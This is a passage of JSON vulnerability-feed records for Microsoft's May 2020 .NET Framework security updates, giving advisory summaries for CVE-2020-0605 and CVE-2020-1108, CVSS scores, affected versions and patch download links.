"cvelist": ["CVE-2020-1108", "CVE-2020-0605"], "modified": "2020-05-12T17:00:22", "id": "KB4552925", "href": "https://support.microsoft.com/en-us/help/4552925/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-12T14:35:23", "description": "None\nRelease Date: \n**May 12, 2020** Version: \n** .NET Framework 4.8**\n\n## Summary\n\nA remote code execution vulnerability exists in .NET Framework software when the software fails to check the source markup of a file. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the current user. If the current user is logged on with administrative user rights, an attacker could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights. Exploitation of the vulnerability requires that a user open a specially crafted file with an affected version of .NET Framework. In an email attack scenario, an attacker could exploit the vulnerability by sending the specially crafted file to the user and convincing the user to open the file. The security update addresses the vulnerability by correcting how .NET Framework checks the source markup of a file. To learn more about the vulnerabilities, go to the following Common Vulnerabilities and Exposures (CVE). \n\n * [CVE-2020-0605](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2020-0605>)\nA denial of service vulnerability exists when .NET Framework improperly handles web requests. An attacker who successfully exploited this vulnerability could cause a denial of service against a .NET Framework web application. The vulnerability can be exploited remotely, without authentication. 
A remote unauthenticated attacker could exploit this vulnerability by issuing specially crafted requests to the .NET Framework application. The update addresses the vulnerability by correcting how the .NET Framework web application handles web requests. To learn more about the vulnerabilities, go to the following Common Vulnerabilities and Exposures (CVE). \n * [CVE-2020-1108](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2020-1108>)\n\n## Known issues in this update \n\nMicrosoft is not currently aware of any issues in this update. \n\n## How to get this update\n\n**Install this update** This update will be downloaded and installed automatically from Windows Update. \nTo get the standalone package for this update, go to the [Microsoft Update Catalog](<http://catalog.update.microsoft.com/v7/site/Search.aspx?q=4552926>) website. **File information** For a list of the files that are provided in this update, download the [file information for cumulative update](<https://download.microsoft.com/download/d/a/9/da9019da-7092-43c4-ac1a-95ab1a2928a0/4552926.csv>). 
\n\n## Information about protection and security\n\n * Protect yourself online: [Windows Security support](<https://support.microsoft.com/hub/4099151/windows-security-help>)\n * Learn how we guard against cyber threats: [Microsoft Security](<https://www.microsoft.com/security>)\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-05-12T07:00:00", "type": "mskb", "title": "May 12, 2020-KB4552926 Cumulative Update for .NET Framework 4.8 for Windows 10 version 1607 and Windows Server 2016", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0605", "CVE-2020-1108"], "modified": "2020-05-12T07:00:00", "id": "KB4552926", "href": "https://support.microsoft.com/en-us/help/4552926", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-31T15:40:59", "description": "None\nRelease Date: \n**May 12, 2020** Version: \n** .NET Framework 4.8**\n\n## Summary\n\nA remote code execution vulnerability exists in .NET Framework software when the software fails to check the source markup of a file. 
An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the current user. If the current user is logged on with administrative user rights, an attacker could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights. Exploitation of the vulnerability requires that a user open a specially crafted file with an affected version of .NET Framework. In an email attack scenario, an attacker could exploit the vulnerability by sending the specially crafted file to the user and convincing the user to open the file. The security update addresses the vulnerability by correcting how .NET Framework checks the source markup of a file. To learn more about the vulnerabilities, go to the following Common Vulnerabilities and Exposures (CVE). \n\n * [CVE-2020-0605](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2020-0605>)\nA denial of service vulnerability exists when .NET Framework improperly handles web requests. An attacker who successfully exploited this vulnerability could cause a denial of service against a .NET Framework web application. The vulnerability can be exploited remotely, without authentication. A remote unauthenticated attacker could exploit this vulnerability by issuing specially crafted requests to the .NET Framework application. The update addresses the vulnerability by correcting how the .NET Framework web application handles web requests. To learn more about the vulnerabilities, go to the following Common Vulnerabilities and Exposures (CVE). \n * [CVE-2020-1108](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2020-1108>)\n\n## Known issues in this update \n\nMicrosoft is not currently aware of any issues in this update. 
\n\n## How to get this update\n\n**Install this update** This update will be downloaded and installed automatically from Windows Update. \nTo get the standalone package for this update, go to the [Microsoft Update Catalog](<http://catalog.update.microsoft.com/v7/site/Search.aspx?q=4552929>) website. **File information** For a list of the files that are provided in this update, download the [file information for cumulative update](<https://download.microsoft.com/download/d/a/9/da9019da-7092-43c4-ac1a-95ab1a2928a0/4552929.csv>). \n\n## Information about protection and security\n\n * Protect yourself online: [Windows Security support](<https://support.microsoft.com/hub/4099151/windows-security-help>)\n * Learn how we guard against cyber threats: [Microsoft Security](<https://www.microsoft.com/security>)\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-05-12T07:00:00", "type": "mskb", "title": "May 12, 2020-KB4552929 Cumulative Update for .NET Framework 4.8 for Windows 10 Version 1803", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1108", "CVE-2020-0605"], "modified": 
"2020-05-12T07:00:00", "id": "KB4552929", "href": "https://support.microsoft.com/en-us/help/4552929", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-12T14:35:34", "description": "None\n**Applies to:**Microsoft .NET Framework 3.5 Microsoft .NET Framework 4.5.2 Microsoft .NET Framework 4.6 Microsoft .NET Framework 4.6.1 Microsoft .NET Framework 4.6.2 Microsoft .NET Framework 4.7 Microsoft .NET Framework 4.7.1 Microsoft .NET Framework 4.7.2 Microsoft .NET Framework 4.8 \n\n## Summary\n\nA remote code execution vulnerability exists in .NET Framework software when the software fails to check the source markup of a file. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the current user. If the current user is logged on with administrative user rights, an attacker could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights. Exploitation of the vulnerability requires that a user open a specially crafted file with an affected version of .NET Framework. In an email attack scenario, an attacker could exploit the vulnerability by sending the specially crafted file to the user and convincing the user to open the file. The security update addresses the vulnerability by correcting how .NET Framework checks the source markup of a file. To learn more about the vulnerabilities, go to the following Common Vulnerabilities and Exposures (CVE). \n\n * [CVE-2020-0605](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2020-0605>)\nA denial of service vulnerability exists when .NET Framework improperly handles web requests. 
An attacker who successfully exploited this vulnerability could cause a denial of service against a .NET Framework web application. The vulnerability can be exploited remotely, without authentication. A remote unauthenticated attacker could exploit this vulnerability by issuing specially crafted requests to the .NET Framework application. The update addresses the vulnerability by correcting how the .NET Framework web application handles web requests. To learn more about the vulnerabilities, go to the following Common Vulnerabilities and Exposures (CVE). \n\n * [CVE-2020-1108](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2020-1108>)\n\n**Important**\n\n * All updates for .NET Framework 4.6, 4.6.1, 4.6.2, 4.7, 4.7.1, and 4.7.2 require that the d3dcompiler_47.dll update is installed. We recommend that you install the included d3dcompiler_47.dll update before you apply this update. For more information about the d3dcompiler_47.dll, see [KB 4019990](<https://support.microsoft.com/en-us/help/4019990>).\n * If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. 
For more information, see [Add language packs to Windows](<https://technet.microsoft.com/en-us/library/hh825699>).\n\n## Additional information about this update\n\nThe following articles contain additional information about this update as it relates to individual product versions.\n\n * [4552979](<https://support.microsoft.com/help/4552979>) Description of the Security and Quality Rollup for .NET Framework 3.5 for Windows Server 2012 (KB4552979) \n * [4552947](<https://support.microsoft.com/help/4552947>) Description of the Security and Quality Rollup for .NET Framework 4.5.2 for Windows Server 2012 (KB4552947) \n * [4552922](<https://support.microsoft.com/help/4552922>) Description of the Security and Quality Rollup for .NET Framework 4.6, 4.6.1, 4.6.2, 4.7, 4.7.1, 4.7.2 for Windows Server 2012 (KB4552922) \n * [4552932](<https://support.microsoft.com/help/4552932>) Description of the Security and Quality Rollup for .NET Framework 4.8 for Windows Server 2012 (KB4552932) \n\n## Information about protection and security\n\n * Protect yourself online: [Windows Security support](<https://support.microsoft.com/hub/4099151/windows-security-help>)\n * Learn how we guard against cyber threats: [Microsoft Security](<https://www.microsoft.com/security>)\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-05-12T07:00:00", "type": "mskb", "title": "Security and Quality Rollup for .NET Framework 3.5, 4.5.2, 4.6, 4.6.1, 4.6.2, 4.7, 4.7.1, 4.7.2, 4.8 for Windows Server 2012 (KB4556400)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, 
"obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0605", "CVE-2020-1108"], "modified": "2020-05-12T07:00:00", "id": "KB4556400", "href": "https://support.microsoft.com/en-us/help/4556400", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-31T15:41:05", "description": "None\nRelease Date: \n**May 12, 2020** Version: \n** .NET Framework 3.5, 4.7.2 and 4.8**\n\n## Summary\n\nA remote code execution vulnerability exists in .NET Framework software when the software fails to check the source markup of a file. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the current user. If the current user is logged on with administrative user rights, an attacker could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights. Exploitation of the vulnerability requires that a user open a specially crafted file with an affected version of .NET Framework. In an email attack scenario, an attacker could exploit the vulnerability by sending the specially crafted file to the user and convincing the user to open the file. The security update addresses the vulnerability by correcting how .NET Framework checks the source markup of a file. To learn more about the vulnerabilities, go to the following Common Vulnerabilities and Exposures (CVE). 
\n\n * [CVE-2020-0605](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2020-0605>)\nA denial of service vulnerability exists when .NET Framework improperly handles web requests. An attacker who successfully exploited this vulnerability could cause a denial of service against a .NET Framework web application. The vulnerability can be exploited remotely, without authentication. A remote unauthenticated attacker could exploit this vulnerability by issuing specially crafted requests to the .NET Framework application. The update addresses the vulnerability by correcting how the .NET Framework web application handles web requests. To learn more about the vulnerabilities, go to the following Common Vulnerabilities and Exposures (CVE). \n * [CVE-2020-1108](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2020-1108>)\n\n## Additional information about this update\n\nThe following articles contain additional information about this update as it relates to individual product versions.\n\n * [4552924](<https://support.microsoft.com/help/4552924>) Description of the Cumulative Update for .NET Framework 3.5 and 4.7.2 for Windows 10 Version 1809 and Windows Server 2019 (KB4552924) \n * [4552930](<https://support.microsoft.com/help/4552930>) Description of the Cumulative Update for .NET Framework 3.5 and 4.8 for Windows 10 Version 1809 and Windows Server 2019 (KB4552930) \n\n## Information about protection and security\n\n * Protect yourself online: [Windows Security support](<https://support.microsoft.com/hub/4099151/windows-security-help>)\n * Learn how we guard against cyber threats: [Microsoft Security](<https://www.microsoft.com/security>)\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", 
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-05-12T07:00:00", "type": "mskb", "title": "May 12, 2020-KB4556441 Cumulative Update for .NET Framework 3.5, 4.7.2 and 4.8 for Windows 10 Version 1809 and Windows Server 2019", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1108", "CVE-2020-0605"], "modified": "2020-05-12T07:00:00", "id": "KB4556441", "href": "https://support.microsoft.com/en-us/help/4556441", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-31T15:41:05", "description": "None\n**Applies to:**Microsoft .NET Framework 3.5 Microsoft .NET Framework 4.5.2 Microsoft .NET Framework 4.6 Microsoft .NET Framework 4.6.1 Microsoft .NET Framework 4.6.2 Microsoft .NET Framework 4.7 Microsoft .NET Framework 4.7.1 Microsoft .NET Framework 4.7.2 Microsoft .NET Framework 4.8 \n\n## Summary\n\nA remote code execution vulnerability exists in .NET Framework software when the software fails to check the source markup of a file. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the current user. If the current user is logged on with administrative user rights, an attacker could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. 
Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights. Exploitation of the vulnerability requires that a user open a specially crafted file with an affected version of .NET Framework. In an email attack scenario, an attacker could exploit the vulnerability by sending the specially crafted file to the user and convincing the user to open the file. The security update addresses the vulnerability by correcting how .NET Framework checks the source markup of a file. To learn more about the vulnerabilities, go to the following Common Vulnerabilities and Exposures (CVE). \n\n * [CVE-2020-0605](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2020-0605>)\nA denial of service vulnerability exists when .NET Framework improperly handles web requests. An attacker who successfully exploited this vulnerability could cause a denial of service against a .NET Framework web application. The vulnerability can be exploited remotely, without authentication. A remote unauthenticated attacker could exploit this vulnerability by issuing specially crafted requests to the .NET Framework application. The update addresses the vulnerability by correcting how the .NET Framework web application handles web requests. To learn more about the vulnerabilities, go to the following Common Vulnerabilities and Exposures (CVE). \n * [CVE-2020-1108](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2020-1108>)\n** Important **\n\n * As a reminder to advanced IT administrators, updates to .NET Framework 3.5 for Windows 8.1 and Windows Server 2012 R2 should only be applied on systems where .NET Framework 3.5 is present and enabled. 
Customers who attempt to pre-install updates to .NET Framework 3.5 to offline images that do not contain the .NET Framework 3.5 product enabled will expose these systems to failures to enable .NET Framework 3.5 after the systems are online. For more extensive information about deploying .NET Framework 3.5, see [Microsoft .NET Framework 3.5 Deployment Considerations.](<https://docs.microsoft.com/en-us/windows-hardware/manufacture/desktop/microsoft-net-framework-35-deployment-considerations>)\n * All updates for Windows 8.1, Windows RT 8.1, and Windows Server 2012 R2 require that update KB 2919355 is installed. We recommend that you install update KB 2919355 on your Windows 8.1-based, Windows RT 8.1-based, or Windows Server 2012 R2-based computer so that you receive updates in the future.\n * If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. 
For more information, see [Add language packs to Windows](<https://technet.microsoft.com/en-us/library/hh825699>).\n\n## Additional information about this update\n\nThe following articles contain additional information about this update as it relates to individual product versions.\n\n * [4552966](<https://support.microsoft.com/help/4552966>) Description of the Security Only Update for .NET Framework 3.5 for Windows 8.1 and Windows Server 2012 R2 (KB4552966) \n * [4552967](<https://support.microsoft.com/help/4552967>) Description of the Security Only Update for .NET Framework 4.5.2 for Windows 8.1 and Windows Server 2012 R2 (KB4552967) \n * [4552959](<https://support.microsoft.com/help/4552959>) Description of the Security Only Update for .NET Framework 4.6, 4.6.1, 4.6.2, 4.7, 4.7.1, 4.7.2 for Windows 8.1 and Windows Server 2012 R2 (KB4552959) \n * [4552962](<https://support.microsoft.com/help/4552962>) Description of the Security Only Update for .NET Framework 4.8 for Windows 8.1 and Windows Server 2012 R2 (KB4552962) \n\n## Information about protection and security\n\n * Protect yourself online: [Windows Security support](<https://support.microsoft.com/hub/4099151/windows-security-help>)\n * Learn how we guard against cyber threats: [Microsoft Security](<https://www.microsoft.com/security>)\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-05-12T07:00:00", "type": "mskb", "title": "Security Only Update for .NET Framework 3.5, 4.5.2, 4.6, 4.6.1, 4.6.2, 4.7, 4.7.1, 4.7.2, 4.8 for Windows 8.1 and Windows Server 2012 R2 (KB4556405)", "bulletinFamily": "microsoft", "cvss2": 
{"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1108", "CVE-2020-0605"], "modified": "2020-05-12T07:00:00", "id": "KB4556405", "href": "https://support.microsoft.com/en-us/help/4556405", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-31T15:40:58", "description": "None\nRelease Date: \n**May 12, 2020** Version: \n** .NET Framework 4.8**\n\n## Summary\n\nA remote code execution vulnerability exists in .NET Framework software when the software fails to check the source markup of a file. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the current user. If the current user is logged on with administrative user rights, an attacker could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights. Exploitation of the vulnerability requires that a user open a specially crafted file with an affected version of .NET Framework. In an email attack scenario, an attacker could exploit the vulnerability by sending the specially crafted file to the user and convincing the user to open the file. The security update addresses the vulnerability by correcting how .NET Framework checks the source markup of a file. 
To learn more about the vulnerabilities, go to the following Common Vulnerabilities and Exposures (CVE). \n\n * [CVE-2020-0605](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2020-0605>)\nA denial of service vulnerability exists when .NET Framework improperly handles web requests. An attacker who successfully exploited this vulnerability could cause a denial of service against a .NET Framework web application. The vulnerability can be exploited remotely, without authentication. A remote unauthenticated attacker could exploit this vulnerability by issuing specially crafted requests to the .NET Framework application. The update addresses the vulnerability by correcting how the .NET Framework web application handles web requests. To learn more about the vulnerabilities, go to the following Common Vulnerabilities and Exposures (CVE). \n * [CVE-2020-1108](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2020-1108>)\n\n## Known issues in this update \n\nMicrosoft is not currently aware of any issues in this update. \n\n## How to get this update\n\n**Install this update** This update will be downloaded and installed automatically from Windows Update. \nTo get the standalone package for this update, go to the [Microsoft Update Catalog](<http://catalog.update.microsoft.com/v7/site/Search.aspx?q=4552928>) website. **File information** For a list of the files that are provided in this update, download the [file information for cumulative update](<https://download.microsoft.com/download/d/a/9/da9019da-7092-43c4-ac1a-95ab1a2928a0/4552928.csv>). 
\n\n## Information about protection and security\n\n * Protect yourself online: [Windows Security support](<https://support.microsoft.com/hub/4099151/windows-security-help>)\n * Learn how we guard against cyber threats: [Microsoft Security](<https://www.microsoft.com/security>)\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-05-12T07:00:00", "type": "mskb", "title": "May 12, 2020-KB4552928 Cumulative Update for .NET Framework 4.8 for Windows 10 Version 1709", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1108", "CVE-2020-0605"], "modified": "2020-05-12T07:00:00", "id": "KB4552928", "href": "https://support.microsoft.com/en-us/help/4552928", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T22:45:09", "description": "<html><body><p>May 12, 2020-KB4552927 Cumulative Update for .NET Framework 4.8 for Windows 10 Version 1703</p><h2></h2><div class=\"alert-band\"> <div class=\"alert alert-info\" role=\"alert\"> <div class=\"row\"> <div class=\"col-xs-24\"> <p> Release Date:<br/><strong>May 12, 2020</strong></p> <p> Version:<br/><strong> 
.NET Framework 4.8</strong></p> </div> </div> </div> </div><h2>Summary</h2><p> A remote code execution vulnerability exists in .NET Framework software when the software fails to check the source markup of a file. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the current user. If the current user is logged on with administrative user rights, an attacker could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights. Exploitation of the vulnerability requires that a user open a specially crafted file with an affected version of .NET Framework. In an email attack scenario, an attacker could exploit the vulnerability by sending the specially crafted file to the user and convincing the user to open the file. The security update addresses the vulnerability by correcting how .NET Framework checks the source markup of a file. </p><p> To learn more about the vulnerabilities, go to the following Common Vulnerabilities and Exposures (CVE). </p><ul><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0605\" id=\"kb-link-2\" target=\"_self\">CVE-2020-0605</a></li></ul><p> A denial of service vulnerability exists when .NET Framework improperly handles web requests. An attacker who successfully exploited this vulnerability could cause a denial of service against a .NET Framework web application. The vulnerability can be exploited remotely, without authentication. A remote unauthenticated attacker could exploit this vulnerability by issuing specially crafted requests to the .NET Framework application. The update addresses the vulnerability by correcting how the .NET Framework web application handles web requests. 
</p><p> To learn more about the vulnerabilities, go to the following Common Vulnerabilities and Exposures (CVE). </p><ul><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1108\" id=\"kb-link-2\" target=\"_self\">CVE-2020-1108</a></li></ul><p> <strong> <span class=\"text-base\">Quality and reliability improvements</span> </strong> </p><table class=\"table\"> <tbody> <tr> <td width=\"100\">Winforms</td> <td> <p> - Addresses an issue with WinForms ComboBox control reinitialization in AD FS MMC UI. </p> <p> - Addresses an issue getting accessible objects for PropertyGridView ComboBox property items - adding the verification for item existence and validity. </p> <p> - Addresses an issue with interaction between WPF user control and hosting WinForms app when processing keyboard input. </p> </td> </tr> <tr> <td width=\"100\">Workflow</td> <td> <p> - Addresses an accessibility issue where text inside a Windows Workflow Foundation Visual Basic Editor would use the wrong colors in high contrast themes. </p> </td> </tr> <tr> <td width=\"100\"> CLR<sup>1</sup></td> <td> <p> - Addresses rare crashes that could occur if Server GC is enabled and a GC occurs while another thread is running NGen'ed code which is making the initial call into NGen'ed code in a 2nd module where one or more parameter types involve valuetypes defined in a 3rd module. </p> <p> - Addresses crashes that could occur in certain scenarios involving hot-added CPUs and/or multi-group machines where per-group CPU count is not consistent across all groups </p> <p> - Addresses rare crashes or deadlocks that could occur if a GC occurs while another thread is running NGen'ed code which is making the initial call into a static method within the same module where one or more parameter types involve type-forwarded valuetypes. </p> <p> - Addresses rare crashes that could occur during the first call that native code makes into the managed portion of a mixed-mode DLL. 
</p> </td> </tr> </tbody> </table><p class=\"indent-1\"> <br/> <sup>1</sup> Common Language Runtime (CLR)<br/></p><h2>Known issues in this update</h2><p> <span>Microsoft is not currently aware of any issues in this update.</span> </p><h2>How to get this update</h2><p> <strong>Install this update</strong> </p><p> This update will be downloaded and installed automatically from Windows Update.<br/></p><p> To get the standalone package for this update, go to the <span lang=\"EN\"><span><span><a data-content-id=\"\" data-content-type=\"\" href=\"http://catalog.update.microsoft.com/v7/site/Search.aspx?q=4552927\" managed-link=\"\" target=\"\">Microsoft Update Catalog</a></span></span></span> website. </p><p> <strong>File information</strong> </p><p> <span>For a list of the files that are provided in this update, download the </span> <a data-content-id=\"\" data-content-type=\"\" href=\"https://download.microsoft.com/download/d/a/9/da9019da-7092-43c4-ac1a-95ab1a2928a0/4552927.csv\" managed-link=\"\" target=\"_blank\"> file information for cumulative update </a>. 
</p><h2>Information about protection and security</h2><ul> <li> Protect yourself online: <a href=\"https://support.microsoft.com/hub/4099151/windows-security-help\" originalsrc=\"https://support.microsoft.com/hub/4099151/windows-security-help\" shash=\"RYy3LeXx+rmimVtQWgsOp2FdFIqw7JA//Q/gQk82okgjOsd4xXdoK0JeBzlEcm0ODcghLacwCQ7rq/te5MIy9rhRyjOI5z+tQLQ58N0ohXStVASL9xwW0nm7tWELhl8Vd+jYkRf314nXnEXaofpGgPwiR8IWSM1V+w57ooqQzME=\" target=\"_blank\">Windows Security support</a></li> <li> Learn how we guard against cyber threats: <a href=\"https://www.microsoft.com/security\" originalsrc=\"https://www.microsoft.com/security\" shash=\"Fb+Q8jcsMznGoXBaEpy7ItSNVM/ojkQHBsLDm3A6U1j8nU/EzgwX89Ox/pQeEuCbTUAIMz1KtFkOsv9oQSp0WSip1uNUHotfXevDx7dDk5kFn4u/io4q1ESXpDplQ989sCEmxdzRlhaLF3PHKXMoLlTmwS5dmeU5gGxfXDhL40w=\">Microsoft Security</a></li> </ul></body></html>", "edition": 2, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": 